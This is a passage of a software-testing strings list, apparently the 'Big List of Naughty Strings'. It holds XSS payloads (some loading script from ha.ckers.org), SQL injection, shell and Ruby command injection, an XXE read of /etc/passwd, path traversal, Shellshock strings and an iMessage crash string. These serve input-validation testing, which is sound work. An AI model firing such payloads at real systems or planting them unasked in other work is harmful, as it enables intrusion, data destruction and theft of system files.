|  | <img src=x onerror=\x10"javascript:alert(1)"> | 
|  | <img src=x onerror=\x11"javascript:alert(1)"> | 
|  | <img src=x onerror=\x12"javascript:alert(1)"> | 
|  | <img src=x onerror=\x32"javascript:alert(1)"> | 
|  | <img src=x onerror=\x00"javascript:alert(1)"> | 
|  | <a href=javascript:javascript:alert(1)>XXX</a> | 
|  | <img src="x` `<script>javascript:alert(1)</script>"` `> | 
|  | <img src onerror /" '"= alt=javascript:alert(1)//"> | 
|  | <title onpropertychange=javascript:alert(1)></title><title title=> | 
|  | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | 
|  | <!--[if]><script>javascript:alert(1)</script --> | 
|  | <!--[if<img src=x onerror=javascript:alert(1)//]> --> | 
|  | <script src="/\%(jscript)s"></script> | 
|  | <script src="\\%(jscript)s"></script> | 
|  | <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | 
|  | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | 
|  | <IMG SRC=# onmouseover="alert('xxs')"> | 
|  | <IMG SRC= onmouseover="alert('xxs')"> | 
|  | <IMG onmouseover="alert('xxs')"> | 
|  | <IMG SRC=javascript:alert('XSS')> | 
|  | <IMG SRC=javascript:alert('XSS')> | 
|  | <IMG SRC=javascript:alert('XSS')> | 
|  | <IMG SRC="jav   ascript:alert('XSS');"> | 
|  | <IMG SRC="jav	ascript:alert('XSS');"> | 
|  | <IMG SRC="jav&#x0A;ascript:alert('XSS');"> | 
|  | <IMG SRC="jav&#x0D;ascript:alert('XSS');"> | 
|  | perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | 
|  | <IMG SRC="   javascript:alert('XSS');"> | 
|  | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | 
|  | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | 
|  | <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | 
|  | <<SCRIPT>alert("XSS");//<</SCRIPT> | 
|  | <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | 
|  | <SCRIPT SRC=//ha.ckers.org/.j> | 
|  | <IMG SRC="javascript:alert('XSS')" | 
|  | <iframe src=http://ha.ckers.org/scriptlet.html < | 
|  | \";alert('XSS');// | 
|  | <u oncopy=alert()> Copy me</u> | 
|  | <i onwheel=alert(1)> Scroll over me </i> | 
|  | <plaintext> | 
|  | http://a/%%30%30 | 
|  | </textarea><script>alert(123)</script> | 
|  |  | 
|  | #	SQL Injection | 
|  | # | 
|  | #	Strings which can cause a SQL injection if inputs are not sanitized | 
|  |  | 
|  | 1;DROP TABLE users | 
|  | 1'; DROP TABLE users-- 1 | 
|  | ' OR 1=1 -- 1 | 
|  | ' OR '1'='1 | 
|  |  | 
|  | % | 
|  | _ | 
|  |  | 
|  | #	Server Code Injection | 
|  | # | 
|  | #	Strings which can cause a user to run code on the server as a privileged user (cf. https://news.ycombinator.com/item?id=7665153) | 
|  |  | 
|  | - | 
|  | -- | 
|  | --version | 
|  | --help | 
|  | $USER | 
|  | /dev/null; touch /tmp/blns.fail ; echo | 
|  | `touch /tmp/blns.fail` | 
|  | $(touch /tmp/blns.fail) | 
|  | @{[system "touch /tmp/blns.fail"]} | 
|  |  | 
|  | #	Command Injection (Ruby) | 
|  | # | 
|  | #	Strings which can call system commands within Ruby/Rails applications | 
|  |  | 
|  | eval("puts 'hello world'") | 
|  | System("ls -al /") | 
|  | `ls -al /` | 
|  | Kernel.exec("ls -al /") | 
|  | Kernel.exit(1) | 
|  | %x('ls -al /') | 
|  |  | 
|  | #	XXE Injection (XML) | 
|  | # | 
|  | #	String which can reveal system files when parsed by a badly configured XML parser | 
|  |  | 
|  | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> | 
|  |  | 
|  | #	Unwanted Interpolation | 
|  | # | 
|  | #	Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. | 
|  |  | 
|  | $HOME | 
|  | $ENV{'HOME'} | 
|  | %d | 
|  | %s | 
|  | {0} | 
|  | %*.*s | 
|  | File:/// | 
|  |  | 
|  | #	File Inclusion | 
|  | # | 
|  | #	Strings which can cause a user to pull in files that should not be a part of a web server | 
|  |  | 
|  | ../../../../../../../../../../../etc/passwd%00 | 
|  | ../../../../../../../../../../../etc/hosts | 
|  |  | 
|  | #	Known CVEs and Vulnerabilities | 
|  | # | 
|  | #	Strings that test for known vulnerabilities | 
|  |  | 
|  | () { 0; }; touch /tmp/blns.shellshock1.fail; | 
|  | () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } | 
|  | <<< %s(un='%s') = %u | 
|  | +++ATH0 | 
|  |  | 
|  | #	MSDOS/Windows Special Filenames | 
|  | # | 
|  | #	Strings which are reserved filenames in MSDOS/Windows | 
|  |  | 
|  | CON | 
|  | PRN | 
|  | AUX | 
|  | CLOCK$ | 
|  | NUL | 
|  | A: | 
|  | ZZ: | 
|  | COM1 | 
|  | LPT1 | 
|  | LPT2 | 
|  | LPT3 | 
|  | COM2 | 
|  | COM3 | 
|  | COM4 | 
|  |  | 
|  | #	IRC specific strings | 
|  | # | 
|  | #	Strings that may occur on IRC clients that make security products freak out | 
|  |  | 
|  | DCC SEND STARTKEYLOGGER 0 0 0 | 
|  |  | 
|  | #	Scunthorpe Problem | 
|  | # | 
|  | #	Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) | 
|  |  | 
|  | Scunthorpe General Hospital | 
|  | Penistone Community Church | 
|  | Lightwater Country Park | 
|  | Jimmy Clitheroe | 
|  | Horniman Museum | 
|  | shitake mushrooms | 
|  | RomansInSussex.co.uk | 
|  | http://www.cum.qc.ca/ | 
|  | Craig Cockburn, Software Specialist | 
|  | Linda Callahan | 
|  | Dr. Herman I. Libshitz | 
|  | magna cum laude | 
|  | Super Bowl XXX | 
|  | medieval erection of parapets | 
|  | evaluate | 
|  | mocha | 
|  | expression | 
|  | Arsenal canal | 
|  | classic | 
|  | Tyson Gay | 
|  | Dick Van Dyke | 
|  | basement | 
|  |  | 
|  | #	Human injection | 
|  | # | 
|  | #	Strings which may cause human to reinterpret worldview | 
|  |  | 
|  | If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. | 
|  |  | 
|  | #	Terminal escape codes | 
|  | # | 
|  | #	Strings which punish the fools who use cat/type on this file | 
|  |  | 
|  | Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue | 
|  | But now...[20Cfor my greatest trick...[8m | 
|  | The quick brown fox... [Beeeep] | 
|  |  | 
|  | #	iOS Vulnerabilities | 
|  | # | 
|  | #	Strings which crashed iMessage in various versions of iOS | 
|  |  | 
|  | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | 
|  | 🏳0🌈️ |